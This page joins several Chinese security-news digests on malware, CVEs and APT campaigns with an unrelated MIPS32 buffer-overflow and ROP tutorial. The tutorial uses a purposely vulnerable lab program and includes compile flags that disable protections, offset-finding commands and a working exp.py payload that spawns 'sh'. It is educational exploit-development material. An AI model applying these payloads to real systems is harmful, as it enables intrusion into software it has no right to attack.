1、恶意PyPI包伪装Solana工具窃取开发者密钥 https://thehackernews.com/2025/05/malicious-pypi-package-posing-as-solana.html 安全研究人员发现，Python包索引（PyPI）上存在一个名为“solana-token”的恶意软件包。该包伪装成Solana区块链开发工具，通过伪造的register_node()函数窃取开发者的源代码及敏感密钥。自2024年4月上传至PyPI后，该恶意包累计被下载761次。在安装时，该恶意软件会扫描开发者Python执行堆栈中的所有文件，提取其中包含的加密密钥、API凭证等敏感信息，并通过硬编码的IP地址将数据外泄。攻击者专门针对那 2、攻击者使用PyInstaller工具在macOS上部署窃密木马 https://www.jamf.com/blog/pyinstaller-malware-jamf-threat-labs/ 安全研究人员发现新型恶意软件活动滥用PyInstaller工具，针对macOS设备发起攻击。攻击者将恶意Python脚本打包为合法应用程序，通过钓鱼邮件或虚假下载链接进行传播。本次攻击活动中攻击者主要窃取密码、浏览器Cookie、剪贴板内容及加密货币钱包等信息，主要针对的目标有企业员工、开发人员及加密货币用户，同时攻击者还会诱导用户禁用Gatekeeper安全防护。 3、Fortinet修复FortiVoice系统中远程代码执行漏洞 https://thehackernews.com/2025/05/fortinet-patches-cve-2025-32756-zero.html Fortinet修补了一个编号为CVE-2025-32756的关键安全漏洞，该漏洞曾被利用来攻击FortiVoice企业电话系统。此漏洞的产生源于FortiVoice、FortiMail、FortiNDR、FortiRecorder和FortiCamera等产品中存在的栈溢出问题。攻击者能够通过精心构造的HTTP请求，远程执行任意代码或命令。Fortinet已观察到该漏洞在FortiVoice系统中被利用的情况，但并未透露攻击规模以及攻击者的 4、英特尔CPU新型漏洞可泄露特权内存敏感数据 https://www.freebuf.com/articles/system/430921.html 现代英特尔CPU普遍存在的新型"分支特权注入"漏洞（Branch Privilege Injection），可使攻击者从操作系统内核等特权软件分配的内存区域窃取敏感数据。这些内存区域通常存储着密码、加密密钥、其他进程内存及内核数据结构等关键信息，其防护至关重要。 5、Ivanti ITSM 曝出高危认证绕过漏洞，可获取管理员权限 https://www.freebuf.com/articles/es/430937.html Ivanti公司已发布安全更新，修复其Neurons for ITSM（IT服务管理）解决方案中存在的一处关键身份验证绕过漏洞。该漏洞可能使未经身份验证的攻击者获取受影响系统的管理员权限。 6、CISA将TeleMessage漏洞列入高危漏洞目录 要求三周内完成修复 https://www.freebuf.com/articles/database/430953.html 美国网络安全和基础设施安全局（CISA）已将TeleMessage公司TM SGNL即时通讯应用的严重漏洞列入已知被利用漏洞（KEV）目录，要求联邦机构在三周内采取修复措施。这款曾被特朗普政府官员使用的以色列应用此前发生数据泄露，导致未加密聊天记录暴露。 7、微软2025年5月星期二补丁修复了5个被利用的零日、72个缺陷 https://www.anquanke.com/post/id/307376 今天是 Microsoft 的 2025 年 5 月补丁星期二，其中包括 72 个缺陷的安全更新，其中包括 5 个被积极利用的漏洞和 2 个公开披露的零日漏洞。 8、Android 16扩展了“高级保护”，具有设备级安全性 https://www.anquanke.com/post/id/307379 Google 宣布对 Android 16 中的高级保护功能进行改进，以加强对复杂间谍软件攻击的防御。 9、Horabot恶意软件通过复杂的网络钓鱼攻击拉丁美洲 https://www.anquanke.com/post/id/307373 在最近的一项调查中，FortiGuard Labs 揭露了一个复杂的网络钓鱼活动，该活动传播了 Horabot 恶意软件系列，这是一种针对拉丁美洲讲西班牙语的用户的欺骗性强大威胁。Horabot 利用熟悉的业务通信（西班牙语的假发票电子邮件）将社会工程与分层脚本技术相结合，以实现持久性、凭据盗窃和自动横向传播。 10、Chrome 将阻止管理员级别的浏览器启动以提高安全性 https://www.bleepingcomputer.com/news/google/google-chrome-to-block-admin-level-browser-launches-for-better-security/ Google 正在推出一项针对 Chromium 的更改，以“降权”Google Chrome，使其不以管理员身份运行，从而在 Windows 中提高安全性。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、APT组织Konni对乌克兰及欧盟外交机构发起网络间谍攻击 https://thehackernews.com/2025/05/north-korean-konni-apt-targets-ukraine.html APT组织Konni近期针对乌克兰政府机构及欧盟外交实体发起网络间谍活动。攻击者通过发送伪装成欧盟政策文件的鱼叉式钓鱼邮件，诱导目标下载恶意LNK文件，进而部署定制化远程控制木马（RAT）。该木马可窃取敏感文件、键盘记录及系统信息，并通过加密通道回传至C2服务器。分析显示，此次攻击主要用于获取俄乌冲突相关情报及欧盟对俄制裁决策细节。目前至少3个乌克兰政府部门和2个欧盟驻外机构受影响，攻击活动最早可追溯至2023年5月。 2、APT37发起名为“Think Tank”的鱼叉式网络钓鱼活动 https://www.genians.co.kr/en/blog/threat_intelligence/toybox-story APT37发起了名为“Think Tank”的鱼叉式网络钓鱼活动，其目标锁定为关注朝鲜的活动人士。攻击者伪装成韩国国家安全智囊团发出邀请，通过邮件分发嵌入了Dropbox链接的压缩档案，该档案中包含恶意LNK文件。攻击者利用与韩国国家安全相关的主题以及实际事件“特朗普2.0时代：前景与韩国的应对”来吸引目标注意，并通过Dropbox云平台分发这些恶意LNK文件。当LNK文件被执行后，它会被配置为通过嵌入参数运行PowerShell命令。该命令触发后，会启动一个 3、摩尔多瓦执法机关逮捕涉嫌DoppelPaymer勒索攻击的嫌疑人 https://thehackernews.com/2025/05/moldovan-police-arrest-suspect-in-45m.html 摩尔多瓦执法机关逮捕了一名45岁的外国男子，怀疑其参与了2021年针对荷兰公司的勒索软件攻击事件。警方查获了超过84,000欧元的现金、电子钱包、两台笔记本电脑、一部手机、一台平板电脑、六张银行卡、两个数据存储设备以及六张内存卡。据调查，该嫌疑人涉嫌与多起网络犯罪活动有关，其中包括针对荷兰公司的勒索软件攻击、勒索及洗钱等行为。其中一起攻击事件针对荷兰科学研究组织（NWO），造成了约450万欧元的损失。该攻击发生在2021年2月，在荷兰科学研 4、Anonymous称窃取了美国航空公司GlobalX的航班数据 https://hackread.com/anonymous-hackers-flight-data-us-deportation-airline-globalx/ 黑客组织Anonymous宣称已成功入侵美国包机航空公司GlobalX，窃取了大量敏感数据，并揭露该公司参与了非法驱逐行动。攻击者通过获取GlobalX开发者的AWS云存储访问令牌，侵入了该公司的数字基础设施，进而窃取了2025年1月19日至5月1日期间的航班日志、乘客名单以及行程细节。这些数据中包含了数百名委内瑞拉移民的驱逐记录，部分乘客在被驱逐时甚至仍在法律申诉阶段。此外，黑客还篡改了GlobalX网站的子域名，发布了一张盖 5、像素隐匿：.NET恶意软件将载荷藏身位图资源 https://www.freebuf.com/articles/430807.html Palo Alto Networks旗下Unit 42团队发现了一种利用隐写术（steganography）的高级混淆技术，攻击者将恶意软件隐藏在看似合法的.NET应用程序位图资源中。这种不断演变的攻击方式正通过恶意垃圾邮件（malspam）活动扩散，主要针对土耳其金融机构和亚洲物流企业。 6、GNU Screen 曝多漏洞：本地提权与终端劫持风险浮现 https://securityonline.info/multiple-cves-in-gnu-screen-local-root-exploit-and-tty-hijacking-discovered/ GNU Screen存在多个高危漏洞，包括本地提权至root（CVE-2025-23395）、终端劫持（CVE-2025-46802）和全局可写PTY（CVE-2025-46803），影响4.9.x和5.0.0版本。SUSE建议避免以setuid-root权限安装，并重构权限模型。 7、黑客开始针对Linux系统测试ClickFix攻击技术 https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets/ 安全研究发现APT36组织正将ClickFix攻击技术扩展到Linux系统，通过伪造网站诱导用户执行恶意命令，可能测试感染链有效性。该技术已覆盖Windows、macOS和Linux三大平台，用户需警惕不明命令执行以防数据泄露。 8、macOS远程视图服务沙箱逃逸高危漏洞PoC已公开 https://securityonline.info/poc-released-cve-2025-31258-sandbox-escape-in-macos-via-remoteviewservices/ 苹果修复macOS高危漏洞CVE-2025-31258，该漏洞可突破沙箱限制获取未授权访问。已在Sequoia 15.5版本中修复，PoC代码已公开，建议用户立即更新。 9、Roblox被控秘密采集未成年用户数据 https://hackread.com/roblox-lawsuit-hidden-tracking-monetize-kids-data/ Roblox被控秘密采集未成年用户数据，涉嫌违反儿童隐私保护法，通过隐蔽追踪工具记录键盘输入等敏感信息并分享给第三方。案件若成立将面临重罚，凸显青少年平台数据安全风险。 10、谷歌将因其位置追踪行为向德克萨斯州支付 14 亿美元 https://www.anquanke.com/post/id/307311 谷歌将向美国德克萨斯州支付 14 亿美元，以解决有关未经授权的位置跟踪和面部识别数据保留的诉讼。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、微软Entra ID遗留协议漏洞致多行业管理员账号遭遇攻击 https://hackread.com/legacy-login-microsoft-entra-id-breach-cloud-accounts/ 微软Entra ID的遗留登录协议存在漏洞，攻击者利用这一漏洞绕过了多因素认证（MFA），对金融、医疗和科技行业的管理员账户发起了攻击。攻击者利用了基本认证版本2 - 资源所有者密码凭证（BAV2ROPC）这一遗留登录方法，该方法允许旧应用程序仅使用简单的用户名和密码进行认证。与现代交互式登录流程不同，BAV2ROPC以非交互式方式运行，这使得攻击者能够完全绕过MFA、条件访问策略等安全措施。此次攻击活动发生在2025年3月18日至4月7日期 2、Linux nftables子系统存在漏洞可导致提权 https://thecyberexpress.com/cve-2024-26809-nftables-vulnerability/ Linux内核的nftables子系统被发现存在一个严重的安全漏洞，编号为CVE-2024-26809。该漏洞属于双释放漏洞，本地攻击者可利用此漏洞提升权限并执行任意代码。nftables是现代Linux发行版中用于网络数据包过滤的子系统，它借助表格、集合、链和规则等组件，能够进行规则匹配。此漏洞存在于nft_set_pipapo的实现中，具体是nft_pipapo_destroy()函数。当集合被标记为“脏”（即已修改但未提交）时，该函数会尝试销毁集合中的所 3、PhaaS网络钓鱼工具包生成伪造的网络钓鱼页面 https://gbhackers.com/phishing-scams-on-the-rise-with-sophisticated-phaas/ 研究人员针对日益复杂的网络钓鱼技术发出警告。当前，这些技术借助专门的网络钓鱼即服务（PhaaS）工具包可以生成伪造的网页。这些工具包让攻击者即便毫无技术经验，也能实时生成伪造的网页。通常，攻击会以一封精心设计的钓鱼邮件开始，从而诱使收件人点击链接。一旦收件人点击链接，就会被导向一个凭证收集的网站。该网站能够动态检索被模仿公司的品牌元素，利用Clearbit等合法的第三方营销服务API，实时获取企业标志和视觉标识符。这种技术营造出了极具迷惑性的假 4、德警方关闭涉及洗钱的eXch加密货币交易所 https://thehackernews.com/2025/05/germany-shuts-down-exch-over-19b.html 德国联邦刑事警察局（BKA）关闭了与洗钱和运营犯罪交易平台有关的eXch加密货币交易所，并扣押了8TB的数据以及价值3400万欧元（约合3825万美元）的加密货币资产，这些资产包括比特币、以太坊、莱特币和达世币。eXch自2014年起开始运营，提供加密货币交换服务，且同时在明网和暗网上开展业务。自eXch成立以来，估计有19亿美元的加密货币资产通过该平台进行转移，其中还包括今年早些时候朝鲜威胁行为者通过攻击Bybit交易所获得的部分非法收益。荷兰财政 5、华硕DriverHub曝严重安全漏洞 用户需立即更新 https://securityonline.info/critical-security-flaws-found-in-asus-driverhub-update-immediately/ 华硕DriverHub曝两大高危漏洞（CVE-2025-3462/3463），攻击者可远程操控主板驱动管理软件。华硕紧急发布1.0.6.0版本修复，用户需立即升级。 6、新型.NET恶意软件"PupkinStealer"窃取浏览器凭证 https://www.freebuf.com/articles/database/430594.html 网络安全公司CYFIRMA向网络安全新闻网站披露，新发现一款名为PupkinStealer的信息窃取型恶意软件。这款基于.NET框架开发的C#程序虽然轻量但功能完备，专门窃取浏览器凭证、桌面文件、即时通讯会话和屏幕截图等敏感数据。 7、AI生成虚假漏洞报告污染漏洞赏金平台 https://cybersecuritynews.com/ai-polluting-bug-bounty-platforms/ AI伪造漏洞报告冲击赏金计划，利用专业术语制造虚假威胁，尤其危害资源不足的开源项目。典型案例显示攻击者通过虚构功能骗取赏金，专家呼吁加强审核以应对日益增长的AI欺诈风险。 8、脸书虚假加密货币交易所广告传播恶意软件 https://hackread.com/fake-crypto-exchange-ads-facebook-spread-malware/ 不法分子通过脸书广告冒用加密货币平台和名人形象，诱导用户下载恶意软件，采用多层攻击架构和精准投放策略，24小时投放超百条广告。Bitdefender提醒用户警惕此类欺诈广告，加强防护措施。 9、Chrome 137 引入设备端 Gemini Nano AI 对抗技术支持诈骗 https://securityonline.info/chrome-137-uses-on-device-gemini-nano-ai-to-combat-tech-support-scams/ Google推出Chrome 137新功能，集成设备端Gemini Nano AI实时拦截技术支持诈骗，弥补云端防护滞后问题，保护隐私同时提升响应速度，标准模式用户也能共享防护成果。 10、微软修复Azure和Power Apps四大高危漏洞 https://securityonline.info/microsoft-patches-four-critical-azure-and-power-apps-vulnerabilities-including-cvss-10-privilege-escalation/ 微软修复Azure和Power Apps四大高危漏洞，包括CVSS满分10.0的Azure DevOps令牌劫持漏洞，凸显云服务安全风险。所有漏洞已平台级修复，用户无需操作。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、以色列NSO因Pegasus攻击WhatsApp被美国罚款1.68亿美元 https://hackread.com/israeli-nso-group-fine-pegasus-spyware-attack-whatsapp/ 美国加州联邦陪审团裁定以色列间谍软件公司NSO Group需向WhatsApp支付总计约1.68亿美元的赔偿金，包括1.67亿美元惩罚性赔偿及44.47万美元补偿性赔偿。此案源于2019年NSO利用WhatsApp语音通话漏洞（CVE-2019-3568）部署Pegasus间谍软件，非法监控全球1400名用户。被监听的用户包括记者、人权活动家及外交官等。 2、南非航空公司遭受网络攻击 https://thecyberexpress.com/saa-cyberattack-system-restored-same-day/ 南非航空公司（SAA）遭遇网络攻击导致其网站、移动应用程序及部分内部系统出现临时中断，其响应团队迅速采取行动遏制了中断并启动了全面调查。SAA在声明中表示，事件发生后立即启动了灾难管理和业务连续性协议，确保了核心航班运营的稳定，并维持了客户服务中心和销售办公室等关键客户服务渠道的正常运作。目前，SAA已引入独立的数字取证调查人员来确定事件根源，并评估数据泄露的范围，目前尚未确认是否存在客户和员工数据是泄露。 3、Azure存储工具AZNFS-mount漏洞可导致Linux系统权限提升 https://cybersecuritynews.com/azure-storage-utility-vulnerability/ 微软Azure的AZNFS-mount工具（用于通过NFS协议挂载Azure Blob存储）存在权限提升漏洞。该漏洞影响所有版本≤2.0.10的AZNFS-mount组件，主要涉及预装该工具的Azure高性能计算/人工智能（HPC/AI）镜像的Linux系统，攻击者可从未授权用户权限提升至root权限，完全控制系统。 4、攻击者利用仿冒的AI视频生成平台传播Noodlophile窃密木马 https://www.morphisec.com/blog/new-noodlophile-stealer-fake-ai-video-generation-platforms/ 攻击者利用公众对人工智能的兴趣，通过仿冒的AI视频生成平台传播Noodlophile窃密木马。这些平台通过Facebook等社交媒体宣传吸引用户，诱骗用户上传图片或视频进行处理，实际下载的文件中包含Noodlophile窃密木马。攻击链包括多个阶段和组件，包括伪装成视频文件的可执行文件、隐藏文件夹和恶意DLL等，Noodlophile窃密木马可窃取受害者浏览器凭证、加密货币钱包等敏感数据，同时还具备部署其他木马的 5、APT35组织伪造德国模特经纪网站窃取用户设备指纹数据 https://cybersecuritynews.com/iranian-hackers-impersonate-as-model-agency/ 由伊朗支持的黑客组织APT35伪造了德国模特经纪公司的官方网站，并借助高仿的钓鱼网站开展精准网络间谍活动。具体而言，该钓鱼网站会动态加载恶意JavaScript代码。当访问者进入网站时，这些代码便会发挥作用，收集访问者的浏览器配置信息、屏幕分辨率、本地及公网IP地址（其中公网IP地址的获取利用了WebRTC漏洞），还会收集设备指纹。此外，攻击者利用Canvas指纹技术为每个设备生成唯一的标识。随后，他们将IP地址与浏览器指纹相结合，构建出受害者 6、美荷联合执法端掉7000台IoT设备组成的代理僵尸网络 https://thehackernews.com/2025/05/breaking-7000-device-proxy-botnet-using.html 美国与荷兰执法部门联合开展了代号为“Operation Moonlander”的行动，成功摧毁了一个由7000台感染设备（包括物联网设备及已到生命周期（EoL）的系统）构成的代理僵尸网络。该僵尸网络依赖恶意软件TheMoon感染设备，它通过扫描开放端口并利用未修补的漏洞进行传播。此僵尸网络通过anyproxy.net和5socks.net进行运营，为黑客提供匿名代理服务，订阅费用为每月9.95美元至110美元不等，攻击者通过该网络累计非 7、恶意npm包伪装开发工具窃取macOS Cursor IDE用户权限 https://socket.dev/blog/malicious-npm-packages-hijack-cursor-editor-on-macos 研究人员发现一起针对macOS Cursor IDE用户的恶意攻击活动。攻击者通过伪装成开发工具的恶意npm包实施攻击，用于窃取用户凭据并修改文件，从而获得持久的后门访问权限。在本次活动中，研究人员共发现三个恶意npm包。这些包的目标锁定为macOS版的热门Cursor AI代码编辑器。它们伪装成提供Cursor API的开发者工具，诱导用户进行安装使用。一旦用户安装并使用这些npm包，攻击者的恶意行为便会启动。它们会窃取用户凭证，从攻击者 8、黑客使用Blob URI伪造登录页实施精准钓鱼 https://hackread.com/phishing-attack-blob-uri-fake-login-pages-browser/ 安全研究人员发现了一种新型钓鱼攻击，该攻击利用浏览器的Blob URI特性，通过伪造银行、社交媒体等可信域名下的登录页面，诱导用户输入敏感信息。浏览器能够使用Blob来处理临时数据，典型的Blob数据包括图片、音频和PDF文件等二进制内容，用户可以使用Blob URI来访问这些Blob数据。攻击者将恶意代码嵌入到通过JavaScript生成的Blob对象中，从而生成伪合法URL，并利用浏览器同源策略的漏洞绕过传统的域名检测机制。在此次攻击活动中，攻击 9、攻击者通过SEO投毒技术攻击IT管理员 https://cybersecuritynews.com/hackers-attacking-it-admins-by-poisoning-seo/ 安全研究人员发现了一种针对IT管理员的复杂攻击活动。攻击者利用SEO投毒技术，将恶意软件的链接推到搜索引擎结果的顶部。当管理员搜索常用工具时，可能会下载到伪装成合法版本的恶意软件，这些恶意软件含有隐藏的恶意载荷。攻击载荷通常伪装成管理员搜索的合法管理软件，并与后门代码一起运行，以此建立命令和控制渠道而不引起怀疑。在此次攻击活动中，一旦恶意软件被执行，就会部署一个基于.NET框架开发的SMOKEDHAM后门木马程序，该后门木马程序为攻击者提供了 10、PupkinStealer窃密木马窃取浏览器凭据 https://cybersecuritynews.com/pupkinstealer-a-new-net-based-malware-steals-browser-credentials-exfiltrate-via-telegram/ 研究人员发现了一款由新型.NET框架开发的窃密木马PupkinStealer，该木马专门窃取用户浏览器的凭据、桌面文件以及通信应用的会话数据，并通过Telegram Bot实现数据的隐蔽外泄。这款木马自2025年4月起开始活跃，由开发者“Ardent”编写。其主要攻击目标包括基于Chromium内核的Chrome、Edge、Opera等浏览器，能够解密浏览 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

0.前言 前段时间写了DVRF系列的题目，对rop的构造感觉还是有点力不从心，所以深入学习一下怎么构造rop链 注意，全程复现应该用ubuntu16.04，不要用18.04或者20.04，不然很有可能会导致后面的gadget找不到 程序至少也要在ubuntu16.04交叉编译，不然直接在ubuntu18.04或者更高版本下，都有可能有gadget找不到的后果.... 1.MIPS32架构堆栈 跟一般的x86架构不同，mips32架构的函数调用方式与x86系统有很大差别，比如说 mips没有栈底指针，也就是ebp，所以当函数进栈的时候，都是需要将当前指针向下移动n个比特，也就是该函数在堆栈空间所存储的大小n，后面就不再移动指针了，只能在函数返回时将栈指针加上偏移量去恢复栈现场，所以寄存器压栈和出栈的时候都需要指明偏移量 参数传递的方式也跟x86不一样，x86是直接压入栈中，而mips是前4个传入的参数通过$a0-$a3寄存器传递，如果参数超过了4个，那么多余的参数会放入调用参数空间 返回地址也不一样，x86调用函数，就是把函数的返回地址压入堆栈中，而mips是把返回地址放入到$ra寄存器中 2.MIPS函数调用 这里引入一个概念叶子函数和非叶子函数 如果一个函数A中不在调用其他任何函数，那么当前函数A就是一个叶子函数，否则就是非叶子函数 当函数A调用函数B的时候： 首先，call指令会复制当前$PC寄存器的值到$RA寄存器中，然后再跳转到B函数并执行 然后这里要判断B函数是否是叶子函数: 如果是非叶子函数，那么是会把放在$RA寄存器中的函数A的返回地址放到堆栈中 如果是叶子函数，那就不用动，函数A的返回地址还是在$RA寄存器中 函数B执行完之后要返回到函数A时 如果是非叶子函数，就要先从堆栈中把函数A的返回地址取出来，然后存到寄存器$RA中，再使用jr $ra跳转到函数A 如何函数B是叶子函数，就直接jr $ra返回函数A 2.1 函数调用参数传递 #include<stdio.h> int test(int a,int b,int c,int d,int e,int f,int g); int main() {    int v1=0;    int v2=1;    int v3=2;    int v4=3;    int v5=4;    int v6=5;    int v7=6;    test(v1,v2,v3,v4,v5,v6,v7);    return 0; } int test(int a, int b, int c, int d, int e, int f, int g) {    char s[50]={0};    sprintf(s,"%d%d%d%d%d%d%d",a,b,c,d,e,f,g); } 根据刚刚所说的，test函数中有7个参数，前4个参数存放在$a0-$a3寄存器中，后3个参数放入main函数栈顶预留调用参数空间中 在ida静态分析可以看出，main函数分配了7个临时变量 其中var_10-var_1C都是要放在$a0-$a3寄存器中，而剩下的var_30，var_34，var_38要从临时变量取出，存储到main函数预留的调用参数空间 动态调试看看，在sprintf函数处下个断点，那边ubuntu开启qemu模拟，这边ida远程动态链接 sudo chroot . ./qemu-mips-static -g 1234 ./mips-test 当main调用test(v1-v7)时，调用者main会先将前4个参数正序存入$a0-$a3寄存器，再将第5-7个参数按正序压入自己的栈空间，低地址对应v5，高地址递增存放v6、v7 当test内部调用sprintf需要传递9个参数时，test会自行将前4个参数正序存入$a0-$a3，剩余5个参数按正序压入自己的新栈空间，整个过程参数始终按源码中的从左到右顺序传递，且每个函数仅操作自己的寄存器或栈空间，不会涉及其他函数的栈帧，而main 传递的 $a0-$a3，也就是v1-v4在 test 调用 sprintf 时被覆盖，但这些值已通过寄存器或 test 的局部变量（a, b, c, d）保存，因此不会丢失 在 MIPS 调用约定中，main 函数通常不会主动取出或恢复存放到寄存器 $a0-$a3 中的参数值 以下这张图堆栈图是上述程序代码中，main函数调用了test函数之后，还需要原来的寄存器$a0-$a3的值，才会把4个寄存器压入到栈中 2.2 MIPS缓冲区溢出 x86架构下，返回地址一般是放入到堆栈中，所以栈溢出可以劫持程序的执行流 mips架构函数的返回地址一般都是在$ra寄存器中，同样也有栈溢出的风险 非叶子函数 #include<stdio.h> void stack(char *src){    char a[20]={0};    strcpy(a,src); } int main(int argc,char *argv[]){    stack(argv[1]);    return 0; } 由前文所知，stack函数是个非叶子函数，所以进入stack函数之后会把main函数的返回地址放入到自己的堆栈底部中，在返回main函数的时候，就会取出堆栈中的返回地址并写入$ra寄存器，然后跳转到main函数 所以如果stack函数的局部变量发生缓冲区溢出，就有可能覆盖掉main函数的返回地址，从而被劫持程序执行流，这一点跟x86是一样的 叶子函数 #include<stdio.h> void stack(char *src, int count){    char s[20]={0};    int i=0;    for(i=0;i<count;i++){        s[i]=src[i];   } } int main(int argc,char *argv[]) {    int count=strlen(argv[1]);    stack(argv[1],count);    return 0; } 由前文所述，stack函数此时是个叶子函数，main函数的返回地址并不会存放到stack函数自己的堆栈空间中，而是放到了$ra寄存器中，所以在ida显示的汇编语言中，可以看到stack函数在执行最末尾的jr $ra指令之前，都没有对$ra寄存器有任何的操作 所以如果按照x86或者非叶子函数那样的溢出方法，是无法覆盖掉main函数的返回地址的，因为无法操作寄存器$ra 但是呢，如果缓冲区溢出覆盖区域足够大，大到能覆盖掉main函数栈帧中存放的上层函数的返回地址，因为main函数也是个非叶子函数，上层函数的返回地址被main函数放在它自己的堆栈中，所以叶子函数也是可以存在缓冲区溢出的风险的，只要覆盖的数据足够大 举一个完整的例子 #include<stdio.h> #include<sys/stat.h> #include<unistd.h> void do_system(int code,char *cmd) { char buf[255]; system(cmd); } void main() { char buf[256]={0}; char ch; int count=0; unsigned int fileLen=0; struct stat fileData; FILE *fp; if(0==stat("passwd",&fileData)) fileLen=fileData.st_size; else return 1; if((fp=fopen("passwd","rb"))==NULL) { printf("Cannot open file passwd!\n"); exit(1); } ch=fgetc(fp); while(count<=fileLen) { buf[count++]=ch; ch=fgetc(fp); } buf[--count]='\x00'; if(!strcmp(buf,"adminpwd")) { do_system(count,"ls -L"); } else { printf("you have an invalid passord!\n"); } fclose(fp); } 危险函数do_system是一个非叶子函数，main函数也是一个非叶子函数 具体功能是从passwd文件中读取密码，如果密码是"adminpwd"，就列出当前目录，否则就显示密码错误并退出程序 创建一个passwd文件然后向其写入500个垃圾数据，然后运行qemu编译过的程序，可以发现程序报错了 python -c "print 'A'*500" > passwd 所以开启一个端口进行远程动态调试，因为ubuntu18.04的原因，导致pwndbg一直报错，无奈只能ida进行远程动态调试了 所以这里配置主要就是ubuntu16.04和ida pro 7.5 不用下断点，直接动态运行，让其崩溃，看看那500个垃圾数据是否能覆盖到内存空间里面 注意这里要关闭掉各种保护，特别是canary保护，不然垃圾数据覆盖不了 mips-linux-gnu-gcc -g -fno-stack-protector -no-pie -fno-pie -z execstack vuln_system.c -static -o vuln_systemsudo chroot . ./qemu-mips-static -g 1234 ./vuln_system 可以看到不仅是内存空间，就连PC寄存器，$ra寄存器，堆栈空间都被覆盖成了垃圾数据，所以这里肯定有栈溢出漏洞，毕竟PC都已经被劫持了 确定可以劫持PC之后，就要精准确定多少字节可以使PC指向期望的地址，也就是要确定偏移量 一般来说用大型字符脚本去确定，通过建立大型字符，然后任取4连续4位，这4位的值在大型字符里面是唯一的，找出覆盖到PC的4个字符在字符集合里面的偏移就可以找到偏移量，通常都是用patternLocOffset.py这个脚本去进行确定 https://github.com/desword/shellcode_tools/blob/master/patternLocOffset.py生成1000个垃圾字符到passwd python patternLocOffset.py -c -l 1000 -f passwd 然后ida动态远程调试，直接让其崩溃，确定PC的地址 可以看到$ra寄存器崩溃的位置在0x34416e35的位置，然后再用patternLocOffset.py去通过劫持的PC地址确定精准偏移量 python patternLocOffset.py -s 0x34416e35 -l 1000 也就是填充404(0x194h)个字节后就可以精准劫持PC了 验证一下 python2 -c "print 'A'*0x194+'BBBBCCCC'" > passwd 可以看到PC和$ra寄存器已经被覆盖成我们想要的BBBBCCCC地址了，这说明404个字节是没错的 确定偏移还有一种方法是栈帧分析，通俗来讲就是静态分析，通过ida显示的数据进行计算得到偏移量 但是我不推荐这种方法，虽然网上还有书上都说可以，但其实我自己去复现了之后发现是行不通的，偏差差太多了，有可能是ida的缘故，也有可能是程序本身在编译的过程中受不同环境影响而偏差，比如说上述例子代码在ida静态分析中计算出来的偏移量就和动态分析出来的不一致，这种情况下还是要以动态的为主，那干脆就一步到位直接动态去确定偏移量就没错了 确定好偏移量之后，就可以确定攻击途径了 根据源代码，该漏洞可以用命令执行，毕竟有一个do_system()函数，或者写shellcode进行攻击 2.2.1 命令执行 这里先介绍命令执行攻击 所以就得跟x86一样构造ROP链，do_system(count,"ls -L")函数有两个参数，由IDA可知其地址为0x00400880 根据前文所说，我们需要找到可以把参数放入$a0和$a1寄存器的gadget 而count是固定字符串，所以只需要找到$a1寄存器的gadget即可 直接在ubuntu用ROPgadget找$a1寄存器的gadget找出来一大堆，而且感觉ROPgadget用来找mips架构的不太好找，不像x86_x64那么方便 所以直接在ida用mipsrop找了 下面这张图是用ubuntu16.04进行mips的交叉编译之后得到的程序所找的gadget，一共是19个gadget 而在此之前，我用了ubuntu18.04进行mips交叉编译得到程序去寻找gadget，只能找到13个 虽然两者都只能找到3个有关$a1寄存器的gadget，但是呢ubuntu18.04那边的gadget最后都只跟$t9寄存器相关 虽说$t9寄存器的值是MIPS程序的函数的起始地址，也就是说MIPS的函数执行机制要求$t9寄存器必须指向当前函数的入口地址，也就是说理论上$t9寄存器可替代$ra控制程序流，但是那得先确保程序中通过 jalr $t9或者类似指令跳转的代码，比如说动态连接函数调用，并且我们还能控制$t9寄存器的值 又或者$t9寄存器的值被保存到堆栈中，且该值可被覆盖，那么这些都是可以控制$t9达到$ra的目的的条件，但很明显，这个例子不具备上述条件，所以自然攻击失败 mipsrop.stackfinders()是一个针对 MIPS二进制文件 的辅助分析命令，帮助漏洞利用开发者快速定位与栈操作相关的ROP gadget 由上到下，我们就选取最后一共0x004474BC地址的gadget，因为其他的gadget要么没有$ra寄存器跳转，要么中间隔得十分远，所以最后一个是最合适的 从gadget看出，我们只要在$sp+0x54+var_3C中构造好字符串，$a1寄存器便可输入我们想要的命令字符串，然后在jr $ra语句时把$ra寄存器覆盖成跳转到do_system函数的地址也就是0x00400A80即可完成整个payload payload: exp.py： import struct print("[*] prepare shellcode") cmd = "sh" cmd += "\00"*(4-(len(cmd) %4))  # 栈对齐 shellcode = "A"*0x194 shellcode += struct.pack(">L",0x004474BC) shellcode += "A"*0x18 #0x18=24 shellcode += cmd shellcode += "B"*(0x3C - len(cmd)) shellcode += struct.pack(">L", 0x00400A80) print("OK!") print("[+] create password file") fw = open('passwd','w') fw.write(shellcode) fw.close() print("ok") 2.2.2 Shellcode 所谓的shellcode就是在缓冲区溢出攻击中植入进程的代码，可以获取shell，执行命令，开启端口等等 一般来说，我们要获取shellcode要么网上搜，要么自己写一个C程序编译后反编译提取汇编指令 而由上述的分析可知，vuln_system存在缓冲区溢出且可以造成命令注入，所以如果要用shellcode攻击的话，可以用execve shellcode让嵌入shellcode的程序运行一个应用程序 但是shellcode可能会遇到NULL的限制导致复制到缓冲区的shellcode是不完整的，所以得进行优化一波，避免出现NULL这样的坏字符 我们还可以建立一个反向连接的shellcode，用来在一个被攻击系统和另一个系统之间建立连接，然后把execve shellcode注入进去，达到命令注入攻击的目的 那就需要socket connect dup2和execve 